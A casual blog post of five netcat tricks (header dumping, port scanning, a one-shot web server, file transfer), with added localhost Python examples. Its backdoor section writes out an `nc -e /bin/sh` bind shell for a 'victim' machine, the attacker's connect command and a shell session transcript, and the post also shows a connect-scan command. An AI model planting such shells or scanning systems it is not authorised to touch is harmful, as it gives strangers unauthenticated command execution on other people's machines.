5 Cool Things to Do With `netcat'


I heard somewhere about 'netcat' being the Swiss-army knife for networking. Looking through its man pages I tried as many commands as I could understand, but still remained unimpressed. But so many wise people calling netcat 'the awesome' can't be wrong, right? So I went to great lengths and surfed the Internets, grep'd some ebooks on networking, re-read its man pages and forced myself to get impressed.
Here is a list of cool things I could figure out to do with netcat. I am sure there are more that my puny brain couldn't discover. Hugs and kisses for all (females) who will tell 'em in the comments.

Banner grabbing / Displaying user-agent for the request

netcat -lp 6969
So basically netcat is 'cat' for the net(work): it copies stdin to a TCP (or UDP) connection and copies whatever arrives back to stdout. With -l it listens instead of connecting, and -p names the port (on OpenBSD-style netcat the port is positional: nc -l 6969). Sounds good for peeking at HTTP headers? To me at least. This is the only thing I use netcat for on a daily basis. Many of my tasks involve making crawlers, and netcat is the first tool I use for exploring what my crawlers send to servers: point the crawler at the listening port and the complete raw request appears on the terminal. The excerpt below was captured with the listener on port 9999, which is why that port shows up in the Host header.
Most of the time I am interested in the User-Agent header, but the command dumps every request header, which is also a quick way to confirm that Accept-Encoding, cookies or authorization headers are really what the client is sending. Done the other way round, connecting to a server's port and typing a request line by hand, the same trick shows the server's response headers, which is the banner-grabbing half of the heading.
Here's an excerpt:
GET / HTTP/1.1
Host: 127.0.0.1:9999
Accept-Language: en
Accept-Encoding: x-gzip,gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Scrapy/0.20.0 (+http://scrapy.org)

Using netcat as a port scanner

nc -zp 9090 localhost 8000-9000 -v
Netcat can find the open ports on a machine: -z makes it connect and disconnect without sending any data, -v prints a line per port, the range 8000-9000 is tried one port at a time, and -p 9090 fixes the source port (it is not what is being scanned). This is a plain TCP connect scan, a full handshake for every port, so it is slow next to nmap and every probe shows up in the target's logs. There are better tools available for this job and they are more efficient. I can't guess why to use nc for this. Maybe because it can be used like this, or because netcat is installed by default on most machines and nmap is not.
Here's an excerpt from when a 'twisted' HTTP server was running on my machine.
localhost [127.0.0.1] 8080 (http-alt) open
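What `nc -z -v host lo-hi` does under the hood, rebuilt in Python as an added example (this is not code from the post): a TCP connect scan, one full three-way handshake per port, which is exactly why each probe lands in the target's service logs. The demo opens its own constructed listener on an OS-chosen port of 127.0.0.1 and scans a small window around it; the `localhost [127.0.0.1] PORT (name) open` line mimics the netcat output shown above, with the service name looked up the same way nc does.

```python
# Added example, not code from the original post: what `nc -z -v host lo-hi`
# does under the hood, rebuilt in Python. It is a TCP connect scan, a full
# three-way handshake on every port, which is why each probe is visible in the
# target's service logs and why nmap's SYN scan is faster and quieter.
import socket
from contextlib import closing


def probe(host: str, port: int, timeout: float = 0.5) -> bool:
    """True if a TCP connect() to host:port succeeds, i.e. something is listening."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.settimeout(timeout)
        # connect_ex returns 0 on success and an errno (ECONNREFUSED, ETIMEDOUT, ...)
        # instead of raising, which keeps the scan loop simple.
        return s.connect_ex((host, port)) == 0


def service_name(port: int) -> str:
    """The '(http-alt)' part of nc -v output: a services-database lookup, '' if unknown."""
    try:
        return socket.getservbyport(port, "tcp")
    except OSError:
        return ""


def scan(host: str, lo: int, hi: int, timeout: float = 0.5) -> list:
    """Equivalent of `nc -z host lo-hi`: the open ports in [lo, hi], ascending."""
    return [p for p in range(lo, hi + 1) if probe(host, p, timeout)]


def demo() -> dict:
    """Constructed target: one listener on an OS-chosen port, scanned with a small window."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as lsn:
        lsn.bind(("127.0.0.1", 0))      # port 0: let the OS pick a free port
        lsn.listen(1)
        port = lsn.getsockname()[1]
        found = scan("127.0.0.1", port - 5, port + 5)
        for p in found:
            # Same shape as the netcat line in the post.
            print(f"localhost [127.0.0.1] {p} ({service_name(p)}) open")
    return {"listening": port, "open": found}


if __name__ == "__main__":
    demo()
```

Once the `with` block ends the listener is gone, so probing the same port again returns False; that is the whole signal a connect scan gives you, open or not, and nothing about what is behind the port.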

Netcat as a simple local network backdoor

This is another one of my favorites. Making backdoors was never this simple. Although this only worked on the local network, it's kind of cool. I think with a little more effort this can be made to work from outside the LAN as well, maybe with tunneling (nc -L) or something. I am too tired to do any more research. Please enlighten me if you can do it. Here's how I did it on my LAN.

On the victim machine run

nc -e "/bin/sh" 127.0.0.1 -lp 8080
nc -e runs the named program once a client connects, with the program's stdin and stdout attached to the socket, so here every line the client sends is executed by /bin/sh on the victim. Two caveats: anyone who can reach that port gets the shell, with no authentication and in cleartext, and -e is a compile-time option that many packaged builds leave out (OpenBSD's nc has no -e at all; nmap's ncat offers the same thing as --exec). I tried running python and ruby scripts, and even installing software with 'pacman', by running a similar command on one machine and then making a request with 'curl', and even with Firefox, from the other machine.

On the attacker machine connect with

nc <victim-ip> <port>
e.g. nc 127.0.0.1 8080, then type ls -a
This opens a session in which each line you type is executed on the victim and its output is shown. Here's an excerpt from one of those I tried.

nc 127.0.0.1 8080
echo $SHELL
/bin/zsh
whoami
channi
pwd 
/home/channi
ls /media/
E
F
cd /media/E
pwd
/media/E
ls
e Books
Games
Images
Movies
Music

Using netcat as a single request web server

{ echo -ne "HTTP/1.0 200 OK\r\nContent-Length: $(wc -c < "$FILE")\r\n\r\n"; cat "$FILE"; } | nc -lp 8080
You don't need to be a $BASH wiz to understand this one (the file name is cut off in the original; $FILE stands for whatever file you want to serve). The braces group two commands whose combined output is piped into netcat listening on port 8080: echo writes the status line, a Content-Length header (wc -c < file prints the byte count without the file name) and the blank line that ends the headers, and cat writes the file itself. It gets served to whoever reaches localhost:8080 first. Yup! First come first served. Because netcat exits when that connection closes, this server works for a single request only. Two things worth knowing: there is no Content-Type header, so the browser guesses the type from the bytes, and if you want the same response for every connection, nmap's ncat can keep listening (-k) and rerun a command per connection (--sh-exec), whereas plain nc would have consumed the piped input on the first hit. I didn't try it over the Internet.
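A Python stand-in for both the header-dumping listener from the first section and the single-request web server above, added here as an example (not code from the post) so the exchange runs without nc installed. `serve_once()` answers one connection the way the shell one-liner does, with a Content-Length computed from the real byte count, then stops listening; it also returns the raw request it received, which is what a plain `nc -lp PORT` prints to the terminal, and `parse_request()` pulls the User-Agent out of it. `fetch()` is a constructed client standing in for the crawler or browser; the User-Agent string in the demo is the Scrapy one from the excerpt above.

```python
# Added example, not code from the original post: a Python stand-in for the two
# netcat pipelines in this post, so the exchange runs without nc installed.
# serve_once() does what `{ echo -ne "HTTP/1.0 200 OK..."; cat FILE; } | nc -lp PORT`
# does (answer one connection, then go away) and also hands back the raw request,
# which is what the plain `nc -lp PORT` listener prints to the terminal.
# fetch() is a constructed client standing in for the crawler or browser.
import socket
import threading


def build_response(body: bytes, content_type: str = "text/plain") -> bytes:
    """Status line, Content-Length from the real byte count, blank line, body.

    HTTP/1.0 so the client does not expect keep-alive on this one-shot server.
    """
    head = (
        "HTTP/1.0 200 OK\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"Content-Type: {content_type}\r\n"
        "\r\n"
    )
    return head.encode("ascii") + body


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP request into its request line and a header dict.

    Header names are case-insensitive, so they are lowercased for lookup.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"request_line": lines[0], "headers": headers}


def listen_local() -> socket.socket:
    """Bind 127.0.0.1 on an OS-chosen port (port 0) and start listening."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv


def serve_once(srv: socket.socket, body: bytes) -> bytes:
    """Answer exactly one connection with `body`, then stop listening; return the raw request."""
    conn, _ = srv.accept()
    raw = b""
    with conn:
        conn.settimeout(5)
        while b"\r\n\r\n" not in raw:       # read up to the end of the headers
            chunk = conn.recv(4096)
            if not chunk:
                break
            raw += chunk
        conn.sendall(build_response(body))
    srv.close()                              # first come, first served: nobody else
    return raw


def fetch(port: int, user_agent: str) -> bytes:
    """Constructed client: GET / with the given User-Agent, return the response body."""
    req = (
        "GET / HTTP/1.1\r\n"
        f"Host: 127.0.0.1:{port}\r\n"
        f"User-Agent: {user_agent}\r\n"
        "Connection: close\r\n\r\n"
    )
    with socket.create_connection(("127.0.0.1", port), timeout=5) as c:
        c.sendall(req.encode("ascii"))
        resp = b""
        while chunk := c.recv(4096):
            resp += chunk
    return resp.partition(b"\r\n\r\n")[2]


def demo(body: bytes, user_agent: str) -> dict:
    """Listener and client in one process; returns what each side saw."""
    srv = listen_local()
    port = srv.getsockname()[1]
    seen = {}
    t = threading.Thread(target=lambda: seen.update(raw=serve_once(srv, body)))
    t.start()
    got = fetch(port, user_agent)
    t.join(5)
    try:                                     # a second client finds nobody home
        fetch(port, user_agent)
        second_refused = False
    except OSError:
        second_refused = True
    return {"request": parse_request(seen["raw"]), "body": got, "second_refused": second_refused}


if __name__ == "__main__":
    r = demo(b"hello from a one-shot server\n", "Scrapy/0.20.0 (+http://scrapy.org)")
    print(r["request"]["headers"]["user-agent"], r["body"], r["second_refused"])
```

The `second_refused` flag is the "single request only" behaviour made visible: after the first connection the listening socket is closed, and the next client gets a connection refused.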

Using netcat as a listener

cat afile.txt | nc 127.0.0.1 9999
nc -l 127.0.0.1 9999 > log.txt
Netcat can be used as a listener (as it is in the first point) and data can be sent over the network as in the commands above. The second command must be run on the recipient machine first, and the first on the sender: nc -l waits for the connection, and everything that arrives is written to log.txt until the sender closes the connection, which happens when cat hits the end of the file. A file can be sent this way. Netcat prints nothing on success and has no integrity check, so a dropped connection simply leaves a short file; compare a checksum (sha256sum) of both copies afterwards. The transfer is also cleartext, so don't do this with anything sensitive over a network you don't control.
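The transfer above (`cat afile.txt | nc HOST 9999` on the sender, `nc -l HOST 9999 > log.txt` on the receiver) rebuilt in Python as an added example (not code from the post), with the check netcat never gives you: each end hashes what it saw and the digests are compared. Both sides run in one process on 127.0.0.1 with an OS-chosen port, the input is constructed, and the file names are the post's, written into a temporary directory.

```python
# Added example, not code from the original post: the transfer above
# (`cat afile.txt | nc HOST 9999` / `nc -l HOST 9999 > log.txt`) rebuilt in
# Python, plus the check netcat never gives you. nc prints nothing on success
# and a dropped connection just leaves a short file, so both ends hash what
# they saw and the digests are compared. Temp directory, 127.0.0.1, OS-chosen port.
import hashlib
import os
import socket
import tempfile
import threading


def receive_to_file(srv: socket.socket, path: str) -> str:
    """Receiver side (`nc -l ... > log.txt`): take one connection, write it to path, return sha256."""
    h = hashlib.sha256()
    conn, _ = srv.accept()
    with conn, open(path, "wb") as f:
        while chunk := conn.recv(65536):    # until the sender's EOF (FIN)
            f.write(chunk)
            h.update(chunk)
    return h.hexdigest()


def send_file(host: str, port: int, path: str) -> str:
    """Sender side (`cat afile.txt | nc host port`): stream the file, return sha256."""
    h = hashlib.sha256()
    with socket.create_connection((host, port), timeout=10) as c, open(path, "rb") as f:
        while chunk := f.read(65536):
            c.sendall(chunk)
            h.update(chunk)
        # The EOF that cat's exit gives nc: tells the receiver the file is complete.
        c.shutdown(socket.SHUT_WR)
    return h.hexdigest()


def demo(data: bytes) -> dict:
    """Run both ends locally and report whether the two digests and sizes agree."""
    tmp = tempfile.mkdtemp()
    src = os.path.join(tmp, "afile.txt")
    dst = os.path.join(tmp, "log.txt")
    with open(src, "wb") as f:
        f.write(data)                        # constructed input

    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    seen = {}
    t = threading.Thread(target=lambda: seen.update(digest=receive_to_file(srv, dst)))
    t.start()
    sent = send_file("127.0.0.1", port, src)
    t.join(10)
    srv.close()

    received_bytes = os.path.getsize(dst)
    return {
        "sent_sha256": sent,
        "received_sha256": seen["digest"],
        "received_bytes": received_bytes,
        "match": sent == seen["digest"] and received_bytes == len(data),
    }


if __name__ == "__main__":
    print(demo(b"some constructed file contents\n" * 1000))
```

With real netcat the same check is `sha256sum afile.txt` on one side and `sha256sum log.txt` on the other; the point of the `shutdown(SHUT_WR)` in `send_file` is that the receiver only knows the file is complete because the sender closed its writing side, which is exactly what ends `nc -l` when cat exits.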

Yes, I didn't properly research for this post. I don't like writing half-assed posts but I have to stick with my New Year's resolution of writing a post a day. All the enlightened souls, please bless me with your wisdom in the comments. Especially anything about making nc persist across multiple requests without scripting it with bash, python or anything.
